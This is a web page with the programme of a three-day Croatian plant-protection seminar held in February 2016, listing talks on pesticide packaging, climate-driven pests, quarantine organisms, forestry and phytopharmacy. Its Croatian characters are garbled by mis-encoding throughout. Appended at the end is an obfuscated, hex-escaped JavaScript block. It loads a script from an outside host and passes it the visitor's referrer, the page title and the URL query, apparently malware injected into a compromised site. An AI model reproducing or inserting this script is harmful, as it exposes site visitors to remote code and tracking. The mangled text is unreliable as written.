I DAN

Utorak, 9. veljaA?e 2016.

10.00 – 14.00

Prijem i akreditacije sudionika Seminara

15.00 – 16.30

Himna Republike Hrvatske
Pozdravna rijeA? organizatora – predsjednica HDBZ prof. dr. sc. Renata BaA?ok
Podjela nagrada i priznanja
NaA?i novi doktor znanosti

16.30

Koktel za sve uA?esnike Seminara
Hotel “4 Opatijska Cvijeta”
Predvorje hotela “Camelija”

17.00

Okrugli stol:
PROBLEMI ZBRINJAVANJA AMBALAA?E SREDSTAVA ZA ZAA�TITU BILJA
Moderator: Jasminka Igrc BarA?iA�

Uvodna izlaganja:
Anamarija BokuliA�-PetriA�, Vlado NovakoviA�, A?eljko Herner: Sustav gospodarenja ambalaA?nim otpadom SZB-a kao dio odrA?ive uporabe pesticida

Darko Horvat: Zakonodavni okvir u gospodarenju otpadnom ambalaA?om

Hana MesiA�, Jasna Kufrin: Sredstva za zaA?titu bilja – obaveze voA�enja podataka o otpadu

Irena BrajeviA�: Iskustva udruge CROCPA u provoA�enju Sustava gospodarenja ambalaA?nim otpadom sredstava za zaA?titu bilja

II DAN

A�Srijeda, 10. veljaA?e 2016.
DVORANA ORHIDEJA

PRIJEPODNE
IZOBRAZBA ZA SIGURNU UPORABU SREDSTAVA ZA ZAA�TITU BILJA

8.30 – 8.45

BoA?ena DeA?A�ek, Vanja KavA?ek, Marino Bralo: Izobrazba profesionalnih korisnika SZB – provedba i rezultati u 2015. godini

8.45 – 9.00

Zoran GrgiA�: Zadovoljstvo polaznika programa izobrazbe profesionalnih korisnika za odrA?ivu uporabu sredstava za zaA?titu bilja

9.00 – 9.15

Tomislav Kos, Zoran Vrhovec, DraA?en BlaA?ekoviA�: A?imbenici uspjeA?ne izobrazbe za odrA?ivu uporabu pesticida pri privatnoj ovlaA?tenoj instituciji

9.15 – 9.30

Rasprava

9.30 – 10.00

Odmor

ZAA�TITA BILJA U EKSTREMNIM KLIMATSKIM UVJETIMA

10.00 – 10.15

DraA?en KauA?iA�: Ekstremi osnovnih meteoroloA?kih elemenata posljednjih 10 godina i moguA�i utjecaj na pojavu i A?irenje biljnih bolesti i A?tetnika

10.15 – 10.30

Ankica SarajliA�, Emilija RaspudiA�, Ivana MajiA�, Mirjana BrmeA?, Marko JosipoviA�: Posljedice klimatskih promjena na pojavu kukuruznog moljca

10.30 – 10.45

Renata BaA?ok, A�imun PaviA�, Ivana KraljeviA� A?upiA�: Dinamika pojave, intenzitet napada i moguA�nosti prognoze kukuruznog moljca u agroekoloA?kim uvjetima Sinjskog polja

10.45 – 11.00

Maja A?aA?ija, Renata BaA?ok, Jasminka Igrc BarA?iA�, A?eljka Zgorelec: Utjecaj promjena u klimatskim uvjetima na dominantnost i areal rasprostranjenja A?iA?njaka

11.00 – 11.15

Mario BjeliA?: 15 godina praA�enja pojave i intenziteta napada maslinine muhe

11.15 – 11.30

Dario IviA�, Jelena Plavec, Ivana KriA?anac: Masovno propadanje marelica u Baranji u 2015. godini

11.30 – 11.45

Milorad A�ubiA�: MoguA�nosti i ograniA?enja suzbijanja A?tetnih organizama u suvremenim nasadima treA?nje pri globalnim klimatskim promjenama

11.45 – 12.00

Josip RaA?ov, Danko ToliA�, Darko VonA?ina: Problematika i moguA�nosti zaA?tite novih intenzivnih nasada treA?nje u proizvodnim uvjetima Dalmacije

12.00 – 12.15

Natalija Galzina, Zvonimir OstojiA�, Klara BariA�, Maja A�A�epanviA�, Ana Pintar: Klimatske promjene, vaA?an A?initelj izmjene sastava i pristupa suzbijanja korova

12.15 – 12.30

Rasprava

12.30 – 14.30

RuA?ak

POSLIJEPODNE

14.30 – 16.00

Okrugli stol
MALE KULTURE I MALE NAMJENE
Moderator: Natalija Galzina

Uvodna izlaganja:
Vlado NovakoviA�, Ljiljana HaA�ar, Jasenka Halapija VujatoviA�: ProA?irenje uporaba SZB na male kulture i male namjene u RH

Fani Bogat, A?eljkica OA?trkapa MeA�ureA?an, Natalija Galzina: ProA?irenja primjene sredstava za zaA?titu bilja na male kulture/namjene u drugim EU zemljama i potrebe u Republici Hrvatskoj

16.00 – 16.30

Odmor

KARANTENSKI A�TETNI ORGANIZMI

16.30 – 16.40

Vjekoslav MarkotiA�, Tatjana Masten Milek, Mario BjeliA?, Mladen A�imala, Maja Pintar: ProvoA�enje programa posebnih nadzora u 2015. u sklopu EU projekta “A�tetni organizmi biljaka” s posebnim osvrtom na A?tetnike agruma

16.40 – 16.50

Zdravka Sever, Dario IviA�, A?eljko TomiA�: Zvjezdasta pjegavost jabuke (Diplocarpon mali) – nova bolest u Hrvatskoj

16.50 – 17.00

Jelena Plavec, Ivana KriA?anac, A?eljko BudinA?A?ak: Epidemijsko A?irenje zlatne A?utice vinove loze (Flavescence doree) u Istri u 2015. godina

17.00 – 17.10

Adrijana Novak, Jasna MilanoviA�, Dario IviA�: Virusne bolesti paprike i njihova pojava u 2015. godini

17.10 – 17.20

Mario BjeliA?, Ivana KriA?anac, Jelena Plavec, Luka PopoviA�, Ivana BuljubaA?iA�, Antonela Kozina, Marijana MiA?etiA�, Dario IviA�: Analiza provedenih aktivnosti, metoda detekcije i intenzivnog nadzora u spreA?avanju introdukcije bakterije Xylella fastidiosa Wells et al.

17.20 – 17.30

A?eljko TomiA�, Dario IviA�: Phytophtbora lateralisA�Tucker & Milbraith – prvi nalaz u Hrvatskoj

17.30 – 18.00

Rasprava

18.00

GODIA�NJA SKUPA�TINA HDBZ

II DAN

Srijeda, 10. veljaA?e 2016.
DVORANA MIMOZA

PRIJEPODNE
A�UMARSTVO

10.00 – 10.15

Milivoj FranjeviA�, Milan GlavaA?, Tanja Gotlin A?uljak, Boris HraA?ovec, Damnjan FranjeviA�: Illinoia liriodendriA�A?tetnik hrvatskog urbanog A?umarstva i njegova genetiA?ka i morfoloA?ka identifikacija

10.15 – 10.30

Mirza DautbaA?iA�, Osman MujezinoviA�:A�Pregled novootrkivenih A?tetnika u A?umama i na hortikulturnim biljkama u Bosni i Hercegovini

10.30 – 10.45

Maarten De Groot, Marija KolA?ek: Procjena najezde potkornjaka u bliA?oj buduA�nosti u Sloveniji

10.45 – 11.00

Marijana MimiA�, Zoran Grecs, Marija KolA?ek: NamnoA?enje potkornjaka u A?umama Slovenije u 2015. godini

11.00 – 11.15

Krunoslav AraA?: Utjecaj stagnirajuA�e povrA?inske vode na pojavu jesenskih potkornjaka

11.15 – 11.30

Luka KasumoviA�: Usporedba uA?inkovitosti razliA?itih naletnobarijernih klopki u lovu smrekinih potkornjaka

11.30 -A�11.45

Nikola LackoviA�, Milan Pernek, Domijan FranjeviA�, Christian Stauffer: Filogeografija gubara u Europi

11.45 – 12.15

Rasprava

12.15 – 14.15

RuA?ak

POSLIJEPODNE
A�UMARSTVO

14.15 – 14.30

Darko Pleskalt: Problematika tretiranja A?umskog sjemena

14.30 – 14.45

JoA?t JakA?a: Procjena rizika za veliki poA?ar u prirodnom okruA?enju

14.45 – 15.00

Linda Bjedov, Marko Vucelja, Josip MargaletiA�: Urod bukvice i miA?ja groznica u Hrvatskoj

15.00 – 15.15

Tarik TreA?tiA�, Ivo SekiA�, Azra A?abaravdiA�: Antifungalna svojstva tilovine Petteria ramentacea (Siber) C. Presl

15.15 – 15.30

A�imek Martin, Danko DiminiA�: Mikoze obiA?ne smreke na podruA?ju UA?ke i Gorskog kotara

15.30 – 15.45

Ivan LukiA�, Milan Pernek, Danko DiminiA�, Marin JeA?iA�, Mirna A?urkoviA�-Perica: Odumiranje mediteranskih hrastova uslijed infekcije gljivomA�Biscognia uxia mediterraneA�(Denot.) Kuntze – prvi nalaz i potvrda RCR metodom

15.45 – 16.00

Milan GlavaA?,A�Jelena Kranjec: Prvi nalaz uzroA?nika bolesti izbojaka i liA?A�a boA?ikovine u Hrvatskoj i druge mikoze

16.00 – 16.30

Rasprava

18.00

GODIA�NJA SKUPA�TINA HDBZ

III DAN

A?etvrtak, 11. veljaA?e 2016.
DVORANA ORHIDEJA

PRIJEPODNE
FITOFARMACIJA

8.30 – 8.40

Darija LemiA�, Renata BaA?ok: Rezistentnost A?tenika na insekticide – od sumnje do dokaza – kako je sprijeA?iti i kako njome upravljati?

8.40 – 8.50

Bogdan CvjetkoviA�: Rezistentnost patogenih gljiva na fungicide i antirezistentna strategija

8.50 – 9.00

Klara BariA�, Zvonimir OstojiA�, Maja A�A�epanoviA�, Ana Pintar: PoveA�ana opasnost od pojave rezistentnosti korova kao posljedica primjene Direktive EC 91/414 i Uredbe EC 1107/2009

9.00 – 9.10

Maja A�A�epanoviA�, Klara BariA�, Zvonimir OstojiA�, Ana Pintar: VaA?nost poznavanja bioloA?kih i ekoloA?kih znaA?ajki divljih prosa u integriranom sustavu suzbijanja

9.10 – 9.25

Zrinka PavuniA� MiljanoviA�, Alojz SreA?: ADENGO – novi herbicid za jednostavniju i uspjeA?niju proizvodnju kukuruza

9.25 – 9.35

Tatjana MeA�imurec, Jadranka BeriA�, A?eljkica OA?trkapa MeA�ureA?an: Nedostatak zoocida u proizvodnji soje

9.35 – 9.45

Aleksandra SudariA�, Tomislav Duvnjak, Maja MatoA?a KoA?ar, Ana JosipoviA�, Miroslav JuriA�: StriA?kov A?arenjak i crveni pauk – dominantni A?tetnici na soji u Slavoniji u 2015. godini

9.45 – 9.55

Ivan Juran, Tanja Gotlin A?uljak: Suzbijanje jesenskih A?tetnika uljane repice nakon zabrane tretiranja sjemena neonikotinoidima

9.55 – 10.05

Dinka GrubiA?iA�: PuA?evi golaA?i u uljanoj repici – prognoza i suzbijanje

10.05 – 10.30

Rasprava

10.30 – 11.00

Odmor

11.00 – 11.10

Georg Drezner, KreA?imir DvojkoviA�, Valentima A�paniA�, Daniela Horvat: Urod pA?enice ovisno o sorti, lokalitetu i fungicidnom tretmanu

11.10 – 11.20

Alojzije LaliA�, Ivan AbiA?iA�, Gordana A�imiA�: Analiza uA?inka genotipa, godine uzgoja i fungicidne zaA?tite na urod i kvalitetu zrna ozimog jeA?ma

11.20 – 11.35

Martin AndroA?eviA�: Novosti u zaA?titi pA?enice od bolesti i korova (Biathlon 4D i Opera Max)

11.35 – 11.45

Branko GlavaA?: Magnello – nova kombinacija fungicida kreirana za uA?inkovitu zaA?titu od bolesti ozime pA?enice i uljane repice

11.45 – 11.55

Zrinka DrmiA�, Helena ViriA�, Darija LemiA�, Maja A?aA?ija, Renata BaA?ok: MoguA�e posljedice eventualne zabrane primjene insekticida za tretiranje sjemenea na intenzitet napada A?tetnika u A?eA�ernoj repi i prinos

11.55 – 12.05

BoA?ena BariA�, Ivana PajaA?: Razlozi povratka starih etnomoloA?kih problema u zaA?titi jabuke i moguA�nosti suzbijanja

12.05 – 12.20

Robert BaA?aj: Faban – novost u zaA?titi jabuke

12.20 – 12.35

Marina Mikac: Novi proizvodi u programu tvrtke CHROMOS AGRO d.d.

12.35 – 12.45

Tracy Roberts: Usporedna procjena SZB koja sadrA?e kandidate za zamjenu prema A?l. 50 Uredbe 1107/2009

12.45 – 13.00

Rasprava

13.00 – 14.30

RuA?akA�

POSLIJEPODNE
AKTUALNOSTI S TERENA

14.30 – 14.40

Ivana MajiA�, Ankica SarajliA�, Branimir NjeA?iA�, Gabriella KaniA?ajiA� A�ariA�, Emilija RaspudiA�, Marija IveziA�: MoguA�nosti proizvodnje mrkve u zaA?tiA�enom prostoru u uvjetima visoke populacije nematoda korijenovih kvrA?ica

14.40 – 14.50

Milorad A�ubiA�: NajvaA?iniji A?tetni organizmi u proizvodnji celera korijenaA?a i moguA�nosti njihova suzbijanja

14.50 – 15.00

Darko JelkoviA�, A?eljko TomiA�, Tamara Rehak: Bakterijske i fuzarijske bolesti sve veA�i problem u proizvodnji krumpira

15.00 – 15.10

Jasenka A?osiA�, Aleksandra SudariA�, Karolina KrandeA?iA�, Maja MatoA?a KoA?ar, Jelena IliA�, Tomislav Duvljak: Fuzarijsko venuA�e soje u Slavoniji

15.10 – 15.20

Zvonimir OstojiA�, Klara BariA�, Maja A�A�epanoviA�, Ana Pinatar: Vilina kosa ponovno problem

15.20 – 15.30

Gordana KoA?ariA�-Silov, Nenad Novak: A�irenje invanzivnih korova u podruA?ju A�ibensko-kninske A?upanije

15.30 – 15.40

Tanja Gotlin A?uljak, Natalija Galzina, Ivan Juran, Martina A?uljak, SiniA?a JelovA?an, Rozalia Pecze: Prisutnost opraA?ivaA?a na cvijetnim traka u tipiA?nim agroekosustavima

15.40 – 16.10

Rasprava

16.10 – 16.40

Odmor

16.40 – 16.50

Goran IvanA?an, A?eljko BudinA?A?ak: Pojava manje poznatih A?tetnika u vinogorjima kontinentalne Hrvatske

16.50 – 17.00

Branimir NjeA?iA�, Ralf Udo Ehlers: Suzbijanje A?ljivinih osica entomopatogenim nematodama

17.00 – 17.10

A?eljko BudinA?A?ak, Goran IvanA?an: Kukuruzni moljac, sve vaA?niji A?tetnik jabuke

17.10 – 17.20

Milorad A�ubiA�, Andrea Braggio, Carlo Bassanetti, Slaven AljinoviA�, AnA�elko TomA?iA�, Tomislav TomA?iA�: Utjecaj mreA?e protiv tuA?e na djelotvornost metode konfuzije ShinEtsu (Isomate C TT) protiv jabukova savijaA?a u MeA�imurju tijekom 2015. godine

17.20 – 17.30

Vesna TomaA?, Mirjana BrmeA?, Krunoslav DugaliA�, Domagoj A�imiA�, Ines MihaljeviA�, Dominik VukoviA�, Marija Viljevac, Zvonimir ZduniA�: UA?inkovitost bioloA?kih pripravaka u suzbijanju jabukova savijaA?a u nasadu jabuka

17.30 – 18.00

Rasprava

18.00

Zatvaranje seminara

20.00

SVEA?ANA VEA?ERA

var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}